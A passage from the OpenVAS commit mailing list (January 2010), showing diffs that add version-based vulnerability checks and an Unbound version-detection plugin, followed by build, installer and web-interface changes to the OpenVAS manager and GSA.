prone to a security-bypass vulnerability because the +application fails to properly validate the domain name in a signed CA +certificate, allowing attackers to substitute malicious SSL +certificates for trusted ones. + +Successfully exploiting this issue allows attackers to perform man-in-the- +middle attacks or impersonate trusted servers, which will aid in +further attacks. + +Versions prior to Sendmail 8.14.4 are vulnerable. + +Solution: +Updates are available. Please see the references for more information. + +References: +http://www.securityfocus.com/bid/37543 +http://www.sendmail.org/releases/8.14.4 +http://www.sendmail.org/ + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if Sendmail version is < 8.14.4"); + script_category(ACT_GATHER_INFO); + script_family("SMTP problems"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("gb_sendmail_detect.nasl"); + script_require_ports("Services/smtp", 25); + exit(0); +} + + +include("version_func.inc"); + +sendmailPort = get_kb_item("Services/smtp"); + +if(!sendmailPort){ + exit(0); +} + +sendmailVer = get_kb_item("SMTP/" + sendmailPort + "/Sendmail"); + +if(sendmailVer != NULL) +{ + if(version_is_less(version:sendmailVer, test_version:"8.14.4")){ + security_warning(sendmailPort); + exit(0); + } +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/sendmail_37543.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/squid_37522.nasl =================================================================== --- trunk/openvas-plugins/scripts/squid_37522.nasl 2010-01-04 16:55:48 UTC (rev 6305) +++ trunk/openvas-plugins/scripts/squid_37522.nasl 2010-01-04 17:09:12 UTC (rev 6306) @@ -0,0 +1,76 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Squid Header-Only Packets Remote Denial of Service Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100412); + script_bugtraq_id(37522); + script_version ("1.0-$Revision$"); + + script_name("Squid Header-Only Packets Remote Denial of Service Vulnerability"); + +desc = "Overview: +Squid is prone to a remote denial-of-service vulnerability. + +An attacker can exploit this to issue to crash the affected +application, denying service to legitimate users. + +References: +http://www.securityfocus.com/bid/37522 +http://events.ccc.de/congress/2009/Fahrplan//attachments/1483_26c3_ipv4_fuckups.pdf +http://www.squid-cache.org/ + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if Squid version is <= 3.1.5"); + script_category(ACT_GATHER_INFO); + script_family("Web application abuses"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("secpod_squid_detect.nasl"); + script_require_ports("Services/www","Services/http_proxy",3128,8080); + exit(0); +} + +include("http_func.inc"); +include("version_func.inc"); + +port = get_kb_item("Services/http_proxy"); + +if(!port){ + exit(0); +} + +if(!vers = get_kb_item(string("www/", port, "/Squid")))exit(0); + +if(!isnull(vers)) { + if(version_is_less(version: vers, test_version: "3.1.5")) { + security_warning(port: port); + exit(0); + } +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/squid_37522.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/unbound_37459.nasl =================================================================== --- trunk/openvas-plugins/scripts/unbound_37459.nasl 2010-01-04 16:55:48 UTC (rev 6305) +++ trunk/openvas-plugins/scripts/unbound_37459.nasl 2010-01-04 17:09:12 UTC (rev 6306) @@ -0,0 +1,82 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Unbound DNS Server NSEC3 Signature Verification DNS Spoofing Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100416); + script_bugtraq_id(37459); + script_cve_id("CVE-2009-3602"); + script_version ("1.0-$Revision$"); + + script_name("Unbound DNS Server NSEC3 Signature Verification DNS Spoofing Vulnerability"); + +desc = "Overview: +Unbound DNS Server is prone to a DNS-spoofing vulnerability. + +Successful exploits allow remote attackers to spoof delegation +responses so as to downgrade secure delegations to insecure status, +which may aid in further attacks. + +Versions prior to Unbound 1.3.4 are vulnerable. + +Solution: +Updates are available. Please see the references for details. + +References: +http://www.securityfocus.com/bid/37459 +http://unbound.net/pipermail/unbound-users/2009-October/000852.html +http://unbound.net/index.html + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if Unbound version is < 1.3.4"); + script_category(ACT_GATHER_INFO); + script_family("General"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("unbound_version.nasl"); + script_require_keys("unbound/version"); + exit(0); +} + +include("version_func.inc"); + +udpPort = 53; +if(!get_udp_port_state(udpPort)){ + exit(0); +} + +bindVer = get_kb_item("unbound/version"); +if(!bindVer){ + exit(0); +} + +if(version_is_less(version:bindVer, test_version:"1.3.4") ) { + security_warning(port:udpPort, proto:"udp"); + exit(0); +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/unbound_37459.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/unbound_version.nasl =================================================================== --- trunk/openvas-plugins/scripts/unbound_version.nasl 2010-01-04 16:55:48 UTC (rev 6305) +++ trunk/openvas-plugins/scripts/unbound_version.nasl 2010-01-04 17:09:12 UTC (rev 6306) @@ -0,0 +1,149 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Detection of Unbound DNS resolver Version +# +# Authors: +# Michael Meyer +# +# Based on bind_version.nasl from Noam Rathaus <noamr at securiteam.com> +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + + desc = "Overview: +The Unbound DNS resolver is running at this host. +Unbound is a validating, recursive, and caching DNS resolver. + +The Unbound DNS resolver allow remote users to query for version and type +information. The query of the CHAOS TXT record 'version.bind', will +typically prompt the server to send the information back to the +querying source. + +Solution: +Set 'hide-version: yes' in unbound.conf. + +See also: +http://unbound.net + +Risk factor : None"; + +if (description) +{ + script_id(100417); + script_version ("1.0-$Revision$"); + script_name("Unbound DNS resolver Detection"); + script_description(desc); + script_summary("Check for the version of Unbound DNS resolver"); + script_category(ACT_GATHER_INFO); + script_family("Service detection"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("find_service.nes","dns_server.nasl"); + exit(0); +} + +include("misc_func.inc"); + + soctcp53 = 0; + + if(get_port_state(53)) + { + soctcp53 = open_sock_tcp(53); + } + if(!soctcp53){ + if(!(get_udp_port_state(53)))exit(0); + socudp53 = open_sock_udp(53); + soc = socudp53; + offset = 0; + } + else { + soc = soctcp53; + offset = 2; + } + + if (soc) + { + + raw_data = raw_string( + 0x00, 0x0A, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x07); + + if(offset)raw_data = raw_string(0x00, 0x1E) + raw_data; + + raw_data = raw_data + "VERSION"; + raw_data = raw_data + raw_string( 0x04 ); + raw_data = raw_data + "BIND"; + raw_data = raw_data + raw_string(0x00, 0x00, 0x10, 0x00, 0x03); + + send(socket:soc, data:raw_data); + result = recv(socket:soc, length:1000); + if (result) + { + if ((result[0+offset] == raw_string(0x00)) && (result[1+offset] == raw_string(0x0A))) + { + if (((result[2+offset] == raw_string(0x81))||(result[2+offset] == raw_string(0x84))) && ((result[3+offset] == raw_string(0x80))||(result[3+offset] == raw_string(0x00)))) + { + if ((result[4+offset] == raw_string(0x00)) && (result[5+offset] == raw_string(0x01))) + { + if ((result[6+offset] == raw_string(0x00)) && (result[7+offset] == raw_string(0x01))) + { + if(result[30+offset]>=0xc0)base=40; + else base=52; + size = ord(result[base+1+offset]); + slen = base + 3 + offset - 1; + if(slen > strlen(result))exit(0); + if (size > 0) + { + hole_data = ""; + for (i = 0; i < size - 1; i = i + 1) + { + hole_data = hole_data + result[base+3+i+offset]; + } + if(offset)proto = "tcp"; + else proto = "udp"; + + if("unbound" >!< hole_data)exit(0); + + hole_data -= string("unbound "); + + info = string("None\n\nUnbound Version '"); + info += hole_data; + info += string("' was detected on the remote Host\n\n"); + + desc = ereg_replace( + string:desc, + pattern:"None$", + replace:info + ); + + set_kb_item(name:"unbound/version",value:hole_data); + set_kb_item(name:string("cpe:/a:unbound:unbound:",hole_data), value: TRUE); + security_note(port:53, data:desc, protocol:proto); + close(soc); + exit(0); + } + } + } + } + } + close(soc); + exit(0); + } + } + +exit(0); Property changes on: trunk/openvas-plugins/scripts/unbound_version.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/viewvc_37518.nasl =================================================================== --- trunk/openvas-plugins/scripts/viewvc_37518.nasl 2010-01-04 16:55:48 UTC (rev 6305) +++ trunk/openvas-plugins/scripts/viewvc_37518.nasl 2010-01-04 17:09:12 UTC (rev 6306) @@ -0,0 +1,87 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# ViewVC Versions Prior to 1.1.3 Multiple Remote Vulnerabilities +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100414); + script_bugtraq_id(37518); + script_version ("1.0-$Revision$"); + + script_name("ViewVC Versions Prior to 1.1.3 Multiple Remote Vulnerabilities"); + +desc = "Overview: +ViewVC is prone to these security vulnerabilities: + +- A security vulnerability that involves root listing of per-root + authorization configuration. +- A security vulnerability in 'query.py' involving the 'forbidden' + authorizer (or none). + +Versions prior to ViewVC 1.1.3 are vulnerable. + +Solution: +Vendor updates are available. Please see the references for details. + +References: +http://www.securityfocus.com/bid/37518 +http://viewvc.tigris.org/source/browse/viewvc/trunk/CHANGES?rev=HEAD +http://viewvc.tigris.org/ + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if ViewVC version is < 1.1.3"); + script_category(ACT_GATHER_INFO); + script_family("Web application abuses"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("viewvc_detect.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + +include("http_func.inc"); +include("http_keepalive.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +if(!version = get_kb_item(string("www/", port, "/viewvc")))exit(0); +if(!matches = eregmatch(string:version, pattern:"^(.+) under (/.*)$"))exit(0); + +vers = matches[1]; + +if(!isnull(vers) && vers >!< "unknown") { + + if(version_is_less(version: vers, test_version: "1.1.3")) { + security_warning(port:port); + exit(0); + } + +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/viewvc_37518.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision From scm-commit at wald.intevation.org Tue Jan 5 08:32:09 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 5 Jan 2010 08:32:09 +0100 (CET) Subject: [Openvas-commits] r6307 - in trunk/openvas-manager: . src Message-ID: <20100105073209.CBB8D86607B5@pyrosoma.intevation.org> Author: felix Date: 2010-01-05 08:32:08 +0100 (Tue, 05 Jan 2010) New Revision: 6307 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/omp.c Log: * src/omp.c (print_report_latex): Fixed size issues in service/port per host overview table by shortening text that is displayed when page breaks within the table occur. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2010-01-04 17:09:12 UTC (rev 6306) +++ trunk/openvas-manager/ChangeLog 2010-01-05 07:32:08 UTC (rev 6307) @@ -1,3 +1,9 @@ +2010-01-05 Felix Wolfsteller <felix.wolfsteller at intevation.de> + + * src/omp.c (print_report_latex): Fixed size issues in service/port per + host overview table by shortening text that is displayed when page + breaks within the table occur. + 2009-01-04 Matthew Mundell <matthew.mundell at intevation.de> Add an option to OMP command GET_CONFIGS for getting the NVT selectors of Modified: trunk/openvas-manager/src/omp.c =================================================================== --- trunk/openvas-manager/src/omp.c 2010-01-04 17:09:12 UTC (rev 6306) +++ trunk/openvas-manager/src/omp.c 2010-01-05 07:32:08 UTC (rev 6307) @@ -3385,13 +3385,13 @@ "\\rowcolor{openvas_report}Service (Port)&Threat Level\\\\\n" "\\hline\n" "\\endfirsthead\n" - "\\multicolumn{2}{l}{\\hfill\\ldots continued from previous page \\ldots}\\\\\n" + "\\multicolumn{2}{l}{\\hfill\\ldots (continued) \\ldots}\\\\\n" "\\hline\n" "\\rowcolor{openvas_report}Service (Port)&Threat Level\\\\\n" "\\hline\n" "\\endhead\n" "\\hline\n" - "\\multicolumn{2}{l}{\\ldots continues on next page \\ldots}\\\\\n" + "\\multicolumn{2}{l}{\\ldots (continues) \\ldots}\\\\\n" "\\endfoot\n" "\\hline\n" "\\endlastfoot\n" From scm-commit at wald.intevation.org Tue Jan 5 08:33:51 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 5 Jan 2010 08:33:51 +0100 (CET) Subject: [Openvas-commits] r6308 - trunk/gsa Message-ID: <20100105073351.A7B0386607B6@pyrosoma.intevation.org> Author: felix Date: 2010-01-05 08:33:51 +0100 (Tue, 05 Jan 2010) New Revision: 6308 Modified: trunk/gsa/CMakeLists.txt trunk/gsa/ChangeLog Log: * CMakeLists.txt: Lowercased some cmake commands. Modified: trunk/gsa/CMakeLists.txt =================================================================== --- trunk/gsa/CMakeLists.txt 2010-01-05 07:32:08 UTC (rev 6307) +++ trunk/gsa/CMakeLists.txt 2010-01-05 07:33:51 UTC (rev 6308) @@ -36,41 +36,41 @@ cmake_policy (SET CMP0005 OLD) endif (POLICY CMP0005) -SET (CMAKE_BUILD_TYPE debug) +set (CMAKE_BUILD_TYPE debug) ## Check existence required tools -SET (MANDATORY_TOOL_MISSING FALSE) +set (MANDATORY_TOOL_MISSING FALSE) -FIND_PROGRAM(PATH_TO_PKGCONFIG pkg-config DOC "pkg-config program to retrieve " +find_program (PATH_TO_PKGCONFIG pkg-config DOC "pkg-config program to retrieve " "information about installed libraries in the system.") -FIND_PROGRAM(PATH_TO_LIBOPENVASCONFIG libopenvas-config DOC "libopenvas-config program" +find_program (PATH_TO_LIBOPENVASCONFIG libopenvas-config DOC "libopenvas-config program" " to retrieve information about installed" " openvas-libraries in the system.") ## TODO this check is obsolete with the FindPkgConfig module (see below, ## pkg_check_module sets OKG_CONFIG_FOUND) -MESSAGE(STATUS "Looking for pkg-config... ${PATH_TO_PKGCONFIG}") -IF(NOT PATH_TO_PKGCONFIG) - SET(MANDATORY_TOOL_MISSING TRUE) -ENDIF(NOT PATH_TO_PKGCONFIG) +message (STATUS "Looking for pkg-config... ${PATH_TO_PKGCONFIG}") +if (NOT PATH_TO_PKGCONFIG) + set (MANDATORY_TOOL_MISSING TRUE) +endif (NOT PATH_TO_PKGCONFIG) -MESSAGE(STATUS "Looking for libopenvas-config... ${PATH_TO_LIBOPENVASCONFIG}") -IF(NOT PATH_TO_LIBOPENVASCONFIG) - SET(MANDATORY_TOOL_MISSING TRUE) -ENDIF(NOT PATH_TO_LIBOPENVASCONFIG) +message (STATUS "Looking for libopenvas-config... ${PATH_TO_LIBOPENVASCONFIG}") +if (NOT PATH_TO_LIBOPENVASCONFIG) + set (MANDATORY_TOOL_MISSING TRUE) +endif (NOT PATH_TO_LIBOPENVASCONFIG) -IF(MANDATORY_TOOL_MISSING) - IF(NOT PATH_TO_PKGCONFIG) - MESSAGE("The pkg-config tool is required.") - ENDIF(NOT PATH_TO_PKGCONFIG) - IF(NOT PATH_TO_LIBOPENVASCONFIG) - MESSAGE("The libopenvas-config tool is required (part of openvas-libraries).") - ENDIF(NOT PATH_TO_LIBOPENVASCONFIG) - MESSAGE(FATAL_ERROR "One or more tools or libraries could not be found on " +if (MANDATORY_TOOL_MISSING) + if (NOT PATH_TO_PKGCONFIG) + message ("The pkg-config tool is required.") + endif (NOT PATH_TO_PKGCONFIG) + if (NOT PATH_TO_LIBOPENVASCONFIG) + message ("The libopenvas-config tool is required (part of openvas-libraries).") + endif (NOT PATH_TO_LIBOPENVASCONFIG) + message (FATAL_ERROR "One or more tools or libraries could not be found on " "your system. Please check the logs above.") -ENDIF(MANDATORY_TOOL_MISSING) +endif (MANDATORY_TOOL_MISSING) # TODO: Check for (optional) rats, flawfinder, splint, doxygen. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-05 07:32:08 UTC (rev 6307) +++ trunk/gsa/ChangeLog 2010-01-05 07:33:51 UTC (rev 6308) @@ -1,3 +1,7 @@ +2009-01-05 Felix Wolfsteller <felix.wolfsteller at intevation.de> + + * CMakeLists.txt: Lowercased some cmake commands. + 2009-01-04 Matthew Mundell <matthew.mundell at intevation.de> Add config exporting. From scm-commit at wald.intevation.org Tue Jan 5 08:57:00 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 5 Jan 2010 08:57:00 +0100 (CET) Subject: [Openvas-commits] r6309 - trunk/winslad Message-ID: <20100105075700.3511986607B6@pyrosoma.intevation.org> Author: mwiegand Date: 2010-01-05 08:56:59 +0100 (Tue, 05 Jan 2010) New Revision: 6309 Modified: trunk/winslad/ChangeLog trunk/winslad/winslad.nsi Log: * winslad.nsi: Make sure prerequisites for clamav are set up correctly. Modified: trunk/winslad/ChangeLog =================================================================== --- trunk/winslad/ChangeLog 2010-01-05 07:33:51 UTC (rev 6308) +++ trunk/winslad/ChangeLog 2010-01-05 07:56:59 UTC (rev 6309) @@ -1,3 +1,7 @@ +2010-01-05 Michael Wiegand <michael.wiegand at intevation.de> + + * winslad.nsi: Make sure prerequisites for clamav are set up correctly. + 2010-01-04 Michael Wiegand <michael.wiegand at intevation.de> Including version from VERSION file in file name of installer. Modified: trunk/winslad/winslad.nsi =================================================================== --- trunk/winslad/winslad.nsi 2010-01-05 07:33:51 UTC (rev 6308) +++ trunk/winslad/winslad.nsi 2010-01-05 07:56:59 UTC (rev 6309) @@ -48,6 +48,7 @@ # clamav plugin SetOutPath $INSTDIR\plugins\clamav file /r /x Makefile /x .svn clamav\*.* + CreateDirectory $INSTDIR\quarant # after all plugins are installed, reset outpath again setOutPath $INSTDIR @@ -68,6 +69,8 @@ WriteRegStr HKLM "${uninstkey}" "DisplayVersion" "${SLADD_VERSION}" WriteRegStr HKLM "${uninstkey}" "NoModify" "1" WriteRegStr HKLM "${uninstkey}" "NoRepair" "1" + WriteRegStr HKLM "Software\ClamAV" "ConfigDir" "$INSTDIR\plugins\clamav" + WriteRegStr HKLM "Software\ClamAV" "DataDir" "$INSTDIR\plugins\clamav" # Create slad user http://nsis.sourceforge.net/UserMgr_plug-in DetailPrint "create ${sladuser} account" @@ -128,7 +131,7 @@ # Remove the Uninstall RegKey DeleteRegKey HKLM "${uninstkey}" - + DeleteRegKey HKLM "Software\ClamAV" # delete the uninstaller DetailPrint "delete WinSLAD files in $INSTDIR" delete "$INSTDIR\uninstall.exe" From scm-commit at wald.intevation.org Tue Jan 5 09:41:58 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 5 Jan 2010 09:41:58 +0100 (CET) Subject: [Openvas-commits] r6310 - trunk/gsa Message-ID: <20100105084158.7444586607CB@pyrosoma.intevation.org> Author: felix Date: 2010-01-05 09:41:57 +0100 (Tue, 05 Jan 2010) New Revision: 6310 Modified: trunk/gsa/CMakeLists.txt trunk/gsa/ChangeLog Log: * CMakeLists.txt: Added clumsy libopenvas required version check and TODO regarding possible improvements. Modified: trunk/gsa/CMakeLists.txt =================================================================== --- trunk/gsa/CMakeLists.txt 2010-01-05 07:56:59 UTC (rev 6309) +++ trunk/gsa/CMakeLists.txt 2010-01-05 08:41:57 UTC (rev 6310) @@ -80,11 +80,40 @@ pkg_check_modules (GSAD_LIBS REQUIRED libxslt gnutls) -if (NOT LIBS_FOUND OR NOT GSAD_LIBS_FOUND) +# TODO The version check of libopenvas will probably be required by other +# modules, too (e.g. openvas-manager). Either +# 1) Move to the next CMake version with built-in version comparison functions +# 2) Use the pkg-config configuration file that kost provided when installing +# openvas-libraries +# 3) Move following checks in an own CMake- module to reuse. Other parts of +# the various CMakeLists.txt could be moved in a common ("openvas") module, +# too. + +## Check version of libopenvas +# Obtain libopenvas version number +exec_program (libopenvas-config + ARGS --version + OUTPUT_VARIABLE LIBOPENVAS_VERSION) +# Make a (per definition: semicolon separated) list of it +string (REGEX REPLACE "\\." ";" LO_VER ${LIBOPENVAS_VERSION}) +list (GET LO_VER 0 LO_MAJOR_VER) +list (GET LO_VER 1 LO_MINOR_VER) +list (GET LO_VER 2 LO_PATCH_VER) +set (LIBOPENVAS_SUFFICIENT TRUE) +if ( ${LO_MAJOR_VER} LESS 3 + OR ${LO_MINOR_VER} LESS 0 + OR ${LO_PATCH_VER} LESS 3 ) + message ("openvas-libraries version >= 3.0.1 not found.") + set (LIBOPENVAS_SUFFICIENT FALSE) +endif ( ${LO_MAJOR_VER} LESS 3 + OR ${LO_MINOR_VER} LESS 0 + OR ${LO_PATCH_VER} LESS 3 ) + +if (NOT LIBS_FOUND OR NOT GSAD_LIBS_FOUND OR NOT LIBOPENVAS_SUFFICIENT) message (FATAL_ERROR "One or more reguired libraries was not found " "(see message above), please install the missing " "libraries and run cmake again.") -endif (NOT LIBS_FOUND OR NOT GSAD_LIBS_FOUND) +endif (NOT LIBS_FOUND OR NOT GSAD_LIBS_FOUND OR NOT LIBOPENVAS_SUFFICIENT) ## Retrieve svn revision (at configure time) # Not using Subversion_WC_INFO, as it would have to connect to the repo Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-05 07:56:59 UTC (rev 6309) +++ trunk/gsa/ChangeLog 2010-01-05 08:41:57 UTC (rev 6310) @@ -1,3 +1,8 @@ +2010-01-05 Felix Wolfsteller <felix.wolfsteller at intevation.de> + + * CMakeLists.txt: Added clumsy libopenvas required version check and + TODO regarding possible improvements. + 2009-01-05 Felix Wolfsteller <felix.wolfsteller at intevation.de> * CMakeLists.txt: Lowercased some cmake commands. From scm-commit at wald.intevation.org Tue Jan 5 10:14:06 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 5 Jan 2010 10:14:06 +0100 (CET) Subject: [Openvas-commits] r6311 - trunk/gsa Message-ID: <20100105091406.402A886607C0@pyrosoma.intevation.org> Author: felix Date: 2010-01-05 10:14:05 +0100 (Tue, 05 Jan 2010) New Revision: 6311 Modified: trunk/gsa/CMakeLists.txt trunk/gsa/ChangeLog Log: * CMakeLists.txt: Corrected version check for libopenvas, required version is now 3.0.1. Modified: trunk/gsa/CMakeLists.txt =================================================================== --- trunk/gsa/CMakeLists.txt 2010-01-05 08:41:57 UTC (rev 6310) +++ trunk/gsa/CMakeLists.txt 2010-01-05 09:14:05 UTC (rev 6311) @@ -102,12 +102,12 @@ set (LIBOPENVAS_SUFFICIENT TRUE) if ( ${LO_MAJOR_VER} LESS 3 OR ${LO_MINOR_VER} LESS 0 - OR ${LO_PATCH_VER} LESS 3 ) + OR ${LO_PATCH_VER} LESS 1 ) message ("openvas-libraries version >= 3.0.1 not found.") set (LIBOPENVAS_SUFFICIENT FALSE) endif ( ${LO_MAJOR_VER} LESS 3 OR ${LO_MINOR_VER} LESS 0 - OR ${LO_PATCH_VER} LESS 3 ) + OR ${LO_PATCH_VER} LESS 1 ) if (NOT LIBS_FOUND OR NOT GSAD_LIBS_FOUND OR NOT LIBOPENVAS_SUFFICIENT) message (FATAL_ERROR "One or more reguired libraries was not found " Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-05 08:41:57 UTC (rev 6310) +++ trunk/gsa/ChangeLog 2010-01-05 09:14:05 UTC (rev 6311) @@ -1,5 +1,10 @@ 2010-01-05 Felix Wolfsteller <felix.wolfsteller at intevation.de> + * CMakeLists.txt: Corrected version check for libopenvas, required + version is now 3.0.1. + +2010-01-05 Felix Wolfsteller <felix.wolfsteller at intevation.de> + * CMakeLists.txt: Added clumsy libopenvas required version check and TODO regarding possible improvements. From scm-commit at wald.intevation.org Tue Jan 5 14:46:49 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 5 Jan 2010 14:46:49 +0100 (CET) Subject: [Openvas-commits] r6312 - in trunk/gsa: . src src/html src/html/src Message-ID: <20100105134649.D085486607B5@pyrosoma.intevation.org> Author: felix Date: 2010-01-05 14:46:48 +0100 (Tue, 05 Jan 2010) New Revision: 6312 Modified: trunk/gsa/ChangeLog trunk/gsa/src/gsad.c trunk/gsa/src/gsad_omp.c trunk/gsa/src/gsad_omp.h trunk/gsa/src/html/make_html trunk/gsa/src/html/src/gsad.xsl trunk/gsa/src/html/src/omp.xsl Log: Added basic auto-refresh functionality for the tasks table. * src/gsad.c (init_validator): Added new "number" and refresh_interval entries, sorted. (exec_omp_post): Pass new parameter to get_status_omp. (exec_omp_get): Minor formatting, read passed refresh_interval request parameter, validate and pass it to get_status_omp. * src/gsad_omp.c (get_nvt_details_omp): Added parameter and pass new <autorefresh> element to the xsl transformation. (create_lsc_credential_omp): Analogous to get_nvt_details_omp, allocate GString only when needed. * src/gsad_omp.h (get_nvt_details_omp): Adjusted header. * src/html/src/gsad.xsl: Added handling of new <auto_refresh> element. * src/html/src/omp.xsl: For the tasks table case, added a form to chose the refresh interval. Added TODO about pre-selecting the selected value after a refresh happened. * src/html/make_html: Removed second newline at end of file. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-05 09:14:05 UTC (rev 6311) +++ trunk/gsa/ChangeLog 2010-01-05 13:46:48 UTC (rev 6312) @@ -1,5 +1,30 @@ 2010-01-05 Felix Wolfsteller <felix.wolfsteller at intevation.de> + Added basic auto-refresh functionality for the tasks table. + + * src/gsad.c (init_validator): Added new "number" and refresh_interval + entries, sorted. + (exec_omp_post): Pass new parameter to get_status_omp. + (exec_omp_get): Minor formatting, read passed refresh_interval request + parameter, validate and pass it to get_status_omp. + + * src/gsad_omp.c (get_nvt_details_omp): Added parameter and pass new + <autorefresh> element to the xsl transformation. + (create_lsc_credential_omp): Analogous to get_nvt_details_omp, allocate + GString only when needed. + + * src/gsad_omp.h (get_nvt_details_omp): Adjusted header. + + * src/html/src/gsad.xsl: Added handling of new <auto_refresh> element. + + * src/html/src/omp.xsl: For the tasks table case, added a form to chose + the refresh interval. Added TODO about pre-selecting the selected value + after a refresh happened. + + * src/html/make_html: Removed second newline at end of file. + +2010-01-05 Felix Wolfsteller <felix.wolfsteller at intevation.de> + * CMakeLists.txt: Corrected version check for libopenvas, required version is now 3.0.1. Modified: trunk/gsa/src/gsad.c =================================================================== --- trunk/gsa/src/gsad.c 2010-01-05 09:14:05 UTC (rev 6311) +++ trunk/gsa/src/gsad.c 2010-01-05 13:46:48 UTC (rev 6312) @@ -211,6 +211,7 @@ openvas_validator_add (validator, "credential_login", "^[[:alnum:]]{1,40}$"); openvas_validator_add (validator, "email", "^[^@ ]{1,150}@[^@ ]{1,150}$"); openvas_validator_add (validator, "family", "^[-_[:alnum:] :]{1,200}$"); + openvas_validator_add (validator, "family_page", "^[_[:alnum:] :]{1,40}$"); openvas_validator_add (validator, "first_result", "^[0-9]+$"); openvas_validator_add (validator, "format", "^(html)|(nbe)|(pdf)|(xml)$"); openvas_validator_add (validator, "hosts", "^[[:alnum:], \\./]{1,80}$"); @@ -218,9 +219,9 @@ openvas_validator_add (validator, "login", "^[[:alnum:]]{1,10}$"); openvas_validator_add (validator, "max_result", "^[0-9]+$"); openvas_validator_add (validator, "name", "^[-_[:alnum:], \\./]{1,80}$"); + openvas_validator_add (validator, "number", "^[0-9]+$"); openvas_validator_add (validator, "oid", "^[0-9.]{1,80}$"); openvas_validator_add (validator, "page", "^[_[:alnum:] ]{1,40}$"); - openvas_validator_add (validator, "family_page", "^[_[:alnum:] :]{1,40}$"); openvas_validator_add (validator, "package_format", "^(key)|(rpm)|(deb)|(exe)$"); openvas_validator_add 